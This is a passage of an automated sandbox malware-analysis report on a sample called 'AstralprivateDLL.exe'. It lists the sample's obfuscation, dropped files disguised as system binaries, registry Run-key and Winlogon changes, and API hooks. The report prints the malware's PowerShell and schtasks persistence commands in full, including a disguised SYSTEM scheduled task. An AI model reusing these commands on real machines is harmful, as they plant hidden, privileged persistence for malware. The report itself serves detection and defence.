                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                  Source: C:\Users\user\Desktop\AstralprivateDLL.exe.bin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                                  Source: Window RecorderWindow detected: More than 3 window changes detected
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeDirectory created: C:\Program Files\Windows Defender\Platform\sihost.exeJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeDirectory created: C:\Program Files\Windows Defender\Platform\66fc9ff0ee96c2Jump to behavior
                                  Source: AstralprivateDLL.exe.bin.exeStatic file information: File size 68917713 > 1048576
                                  Source: AstralprivateDLL.exe.bin.exeStatic PE information: Raw size of VyCxe is bigger than: 0x100000 < 0x72bc00
                                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: AstralprivateDLL.exe.bin.exe, 00000000.00000003.1717902037.0000000003033000.00000004.00000020.00020000.00000000.sdmp, Astral private DLL.exe, 00000001.00000003.1728765563.0000000006653000.00000004.00000020.00020000.00000000.sdmp, Astral private DLL.exe, 00000001.00000003.1729671319.000000000665D000.00000004.00000020.00020000.00000000.sdmp, Astral private DLL.exe, 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmp, Astral private DLL.exe, 00000001.00000000.1725815742.0000000000193000.00000002.00000001.01000000.00000005.sdmp

                                  Data Obfuscation

                                  barindex
                                  Source: C:\Users\user\Desktop\AstralprivateDLL.exe.bin.exeUnpacked PE file: 0.2.AstralprivateDLL.exe.bin.exe.400000.0.unpack 0:EW;VyCxe:EW;.rsrc:W; vs 0:ER;VyCxe:ER;.rsrc:W;
                                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#amvyyojjq#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                                  Source: C:\Users\user\AppData\Local\Temp\twain_32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#amvyyojjq#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }Jump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\toes5wxx\toes5wxx.cmdline"
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\toes5wxx\toes5wxx.cmdline"Jump to behavior
                                  Source: initial sampleStatic PE information: section where entry point is pointing to: VyCxe
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeFile created: C:\containerperf\__tmp_rar_sfx_access_check_6265906Jump to behavior
                                  Source: updater.exe.2.drStatic PE information: real checksum: 0x5b8dd9 should be: 0x5ca755
                                  Source: twain_32.exe.0.drStatic PE information: real checksum: 0x5b8dd9 should be: 0x5ca755
                                  Source: SecurityHealthSystray.exe.42.drStatic PE information: real checksum: 0x0 should be: 0x7332
                                  Source: bcapgbqjwdsj.tmp.2.drStatic PE information: real checksum: 0x0 should be: 0x342e8
                                  Source: AstralprivateDLL.exe.bin.exeStatic PE information: section name: 0
                                  Source: AstralprivateDLL.exe.bin.exeStatic PE information: section name: VyCxe
                                  Source: Astral private DLL.exe.0.drStatic PE information: section name: .didat
                                  Source: twain_32.exe.0.drStatic PE information: section name: .xdata
                                  Source: updater.exe.2.drStatic PE information: section name: .xdata
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeCode function: 1_2_0017F640 push ecx; ret 1_2_0017F653
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeCode function: 1_2_0017EB78 push eax; ret 1_2_0017EB96
                                  Source: C:\Users\user\AppData\Local\Temp\twain_32.exeCode function: 2_2_0000024B345284FD push rcx; retf 003Fh2_2_0000024B345284FE
                                  Source: C:\Users\user\AppData\Local\Temp\twain_32.exeCode function: 2_2_0000024B345222B8 push rdx; retf 2_2_0000024B345222B9
                                  Source: C:\Users\user\AppData\Local\Temp\twain_32.exeCode function: 2_2_0000024B345694FD push rcx; retf 003Fh2_2_0000024B345694FE
                                  Source: C:\Windows\System32\conhost.exeCode function: 8_2_00000216AAA822B8 push rdx; retf 8_2_00000216AAA822B9
                                  Source: C:\Windows\System32\conhost.exeCode function: 8_2_00000216AAA884FD push rcx; retf 003Fh8_2_00000216AAA884FE
                                  Source: C:\Windows\System32\conhost.exeCode function: 8_2_00000216ACFE94FD push rcx; retf 003Fh8_2_00000216ACFE94FE
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeCode function: 13_2_1AFD22B8 push rdx; retf 13_2_1AFD22B9
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeCode function: 13_2_1AFD84FD push rcx; retf 003Fh13_2_1AFD84FE
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeCode function: 13_2_00007FFD9BAC536A push ecx; ret 13_2_00007FFD9BAC5376
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeCode function: 13_2_00007FFD9BAC560D pushad ; ret 13_2_00007FFD9BAC5612
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeCode function: 13_2_00007FFD9BAC2C70 pushad ; ret 13_2_00007FFD9BAC2C75
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeCode function: 13_2_00007FFD9BAC00BD pushad ; iretd 13_2_00007FFD9BAC00C1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FFD9B99D2A5 pushad ; iretd 21_2_00007FFD9B99D2A6
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FFD9BAB7B8A push eax; ret 21_2_00007FFD9BAB7B99
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FFD9BAB3A79 pushad ; ret 21_2_00007FFD9BAB3AC9
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FFD9BAB3A36 pushad ; ret 21_2_00007FFD9BAB3AC9
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FFD9BAB00BD pushad ; iretd 21_2_00007FFD9BAB00C1
                                  Source: C:\Windows\System32\conhost.exeCode function: 22_2_0000013ACAE784FD push rcx; retf 003Fh22_2_0000013ACAE784FE
                                  Source: C:\Windows\System32\conhost.exeCode function: 22_2_0000013ACAE722B8 push rdx; retf 22_2_0000013ACAE722B9
                                  Source: C:\Windows\System32\conhost.exeCode function: 22_2_0000013ACAEA94FD push rcx; retf 003Fh22_2_0000013ACAEA94FE
                                  Source: C:\Windows\System32\winlogon.exeCode function: 27_2_00000225DC6222B8 push rdx; retf 27_2_00000225DC6222B9
                                  Source: C:\Windows\System32\winlogon.exeCode function: 27_2_00000225DC6284FD push rcx; retf 003Fh27_2_00000225DC6284FE
                                  Source: C:\Windows\System32\winlogon.exeCode function: 27_2_00000225DC6594FD push rcx; retf 003Fh27_2_00000225DC6594FE
                                  Source: C:\Windows\System32\lsass.exeCode function: 28_2_00000202C0AC22B8 push rdx; retf 28_2_00000202C0AC22B9
                                  Source: C:\Windows\System32\lsass.exeCode function: 28_2_00000202C0AC84FD push rcx; retf 003Fh28_2_00000202C0AC84FE
                                  Source: C:\Windows\System32\lsass.exeCode function: 28_2_00000202C0AF94FD push rcx; retf 003Fh28_2_00000202C0AF94FE
                                  Source: C:\Windows\System32\svchost.exeCode function: 30_2_000002A6612E22B8 push rdx; retf 30_2_000002A6612E22B9
                                  Source: C:\Windows\System32\svchost.exeCode function: 30_2_000002A6612E84FD push rcx; retf 003Fh30_2_000002A6612E84FE
                                  Source: C:\Windows\System32\svchost.exeCode function: 30_2_000002A6613194FD push rcx; retf 003Fh30_2_000002A6613194FE
                                  Source: ServerComponenthostMonitorDll.exe.1.drStatic PE information: section name: .text entropy: 7.577362428159145
                                  Source: WmiPrvSE.exe.13.drStatic PE information: section name: .text entropy: 7.577362428159145
                                  Source: WmiPrvSE.exe0.13.drStatic PE information: section name: .text entropy: 7.577362428159145
                                  Source: sihost.exe.13.drStatic PE information: section name: .text entropy: 7.577362428159145
                                  Source: lsass.exe.13.drStatic PE information: section name: .text entropy: 7.577362428159145
                                  Source: powershell.exe.13.drStatic PE information: section name: .text entropy: 7.577362428159145

                                  Persistence and Installation Behavior

                                  barindex
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeFile created: C:\containerperf\lsass.exeJump to dropped file
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exe
                                  Source: C:\Windows\System32\lsass.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                                  Source: C:\Windows\System32\lsass.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeFile created: C:\Users\user\Desktop\IbBZTfZC.logJump to dropped file
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeFile created: C:\Program Files\Windows Defender\Platform\sihost.exeJump to dropped file
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeFile created: C:\Users\user\Desktop\nWKkNNTp.logJump to dropped file
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\twain_32.exeFile created: C:\Users\user\AppData\Local\Temp\bcapgbqjwdsj.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\twain_32.exeFile created: C:\Program Files\Google\Chrome\updater.exeJump to dropped file
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeFile created: C:\containerperf\lsass.exeJump to dropped file
                                  Source: C:\Users\user\Desktop\AstralprivateDLL.exe.bin.exeFile created: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeJump to dropped file
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeFile created: C:\Windows\en-GB\WmiPrvSE.exeJump to dropped file
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeFile created: C:\Users\user\Desktop\AvUrEmYP.logJump to dropped file
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeFile created: C:\Users\user\Desktop\gYWllyYA.logJump to dropped file
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeFile created: C:\Users\user\Desktop\OMvfRcDl.logJump to dropped file
                                  Source: C:\Users\user\Desktop\AstralprivateDLL.exe.bin.exeFile created: C:\Users\user\AppData\Local\Temp\twain_32.exeJump to dropped file
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeFile created: C:\containerperf\WmiPrvSE.exeJump to dropped file
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeFile created: C:\Users\user\Desktop\QWRgRujm.logJump to dropped file
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeFile created: C:\Windows\appcompat\powershell.exeJump to dropped file
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeFile created: C:\Users\user\Desktop\qHqBUadh.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeFile created: C:\containerperf\ServerComponenthostMonitorDll.exeJump to dropped file
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeFile created: C:\Windows\en-GB\WmiPrvSE.exeJump to dropped file
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeFile created: C:\Windows\appcompat\powershell.exeJump to dropped file
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeFile created: C:\Users\user\Desktop\IbBZTfZC.logJump to dropped file
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeFile created: C:\Users\user\Desktop\AvUrEmYP.logJump to dropped file
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeFile created: C:\Users\user\Desktop\qHqBUadh.logJump to dropped file
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeFile created: C:\Users\user\Desktop\gYWllyYA.logJump to dropped file
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeFile created: C:\Users\user\Desktop\QWRgRujm.logJump to dropped file
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeFile created: C:\Users\user\Desktop\OMvfRcDl.logJump to dropped file
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeFile created: C:\Users\user\Desktop\nWKkNNTp.logJump to dropped file

                                  Boot Survival

                                  barindex
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run powershellJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run powershell "C:\Windows\appcompat\powershell.exe"Jump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run powershell "C:\Windows\appcompat\powershell.exe"Jump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSEJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ServerComponenthostMonitorDllJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sihostJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run powershellJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lsassJump to behavior
                                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#amvyyojjq#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                                  Source: C:\Windows\System32\lsass.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 9 /tr "'C:\containerperf\lsass.exe'" /rl HIGHEST /f
                                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\System32\Tasks\lsassl
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run powershellJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run powershellJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run powershellJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run powershellJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lsassJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lsassJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lsassJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lsassJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sihostJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sihostJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSEJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSEJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSEJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSEJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ServerComponenthostMonitorDllJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ServerComponenthostMonitorDllJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ServerComponenthostMonitorDllJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ServerComponenthostMonitorDllJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSEJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSEJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSEJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSEJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc

                                  Hooking and other Techniques for Hiding and Protection

                                  barindex
                                  Source: C:\Users\user\AppData\Local\Temp\twain_32.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\BCAPGBQJWDSJ.TMP
                                  Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
                                  Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
                                  Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
